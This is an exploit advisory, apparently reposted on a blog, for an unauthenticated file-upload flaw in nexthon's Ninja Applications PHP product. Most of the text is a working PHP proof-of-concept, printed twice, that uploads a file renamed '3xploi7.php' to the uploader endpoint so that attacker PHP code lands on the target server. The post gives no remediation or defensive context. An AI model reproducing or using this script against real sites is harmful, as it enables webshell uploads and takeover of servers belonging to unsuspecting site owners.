#- Title : Ninja Application Remote Vulnerability
#- Vendor : nexthon
#- Platform : PHP
#- Platform : PHP
#- Tested on : Windows 8 , Linux
#- Date : 9/16/15
#- Vuln Code : {"jsonrpc" : "2.0", "result" : null, "id" : "id", "cleanFileName" : ""}
#- Vulnerability : /ninja-applications/fufu/controllers/uploader/upload.php
proof of concept :
<?php
$url = "http://target/ninja-applications/fufu/controllers/uploader/upload.php"; // put URL Here
$post = array
(
"file" => "@3xploi7.jpg",
"name" => "3xploi7.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
$url = "http://target/ninja-applications/fufu/controllers/uploader/upload.php"; // put URL Here
$post = array
(
"file" => "@3xploi7.jpg",
"name" => "3xploi7.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Result : Here
0 Response to "Ninja Application Remote Code Vulnerability"
Posting Komentar